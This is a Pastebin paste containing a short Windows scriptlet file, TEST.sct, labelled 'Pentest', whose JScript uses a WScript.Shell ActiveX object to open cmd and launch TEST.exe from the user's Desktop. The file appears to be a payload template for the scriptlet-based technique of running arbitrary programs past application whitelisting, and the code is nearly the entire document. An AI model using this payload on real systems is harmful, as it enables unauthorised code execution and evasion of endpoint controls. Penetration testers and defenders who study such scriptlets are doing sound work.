Advertisement
Guest User

TEST.sct

a guest
Oct 17th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. <?XML version="1.0"?>
  2. <scriptlet>
  3. <registration
  4. progid="Pentest"
  5. classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
  6. <script language="JScript">
  7.  
  8. <![CDATA[
  9. var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd USERPROFILE%\Desktop\ & TEST.exe");
  10. ]]>
  11.  
  12. </script>
  13. </registration>
  14. </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement